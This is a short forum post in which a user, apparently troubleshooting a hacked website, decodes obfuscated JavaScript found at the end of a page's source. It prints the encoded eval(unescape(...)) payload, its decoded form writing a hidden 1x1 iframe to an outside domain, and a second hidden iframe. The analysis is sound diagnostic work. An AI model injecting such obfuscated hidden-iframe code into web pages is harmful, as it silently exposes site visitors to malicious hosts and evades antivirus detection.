Ok thnx for the input guys. Hey Steve I am checking the generated source. Saw some encoded js at the end. Gonna decode and see what it is. Probably reason my AV never got triggered. FAIL.
Code:
<script language="javascript">eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%67%72%65%65%6E%6C%70%6C%2E%63%6F%6D%2F%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B"))</script>
Turns out it is...
Code:
<script language="javascript">eval(unescape("document.write('<iframe src="http://greenlpl.com/in.php" width=1 height=1 frameborder=0></iframe>');"))</script>
Another iframe
Code:
<iframe src="http://ssdfsdfwefwefwe.com/" width=1 height=1 frameborder=0></iframe>
The site in the last iframe must be the sneaky one. DNS from everydns means definitely shady. Gonna give these cpaunderground dudes a call.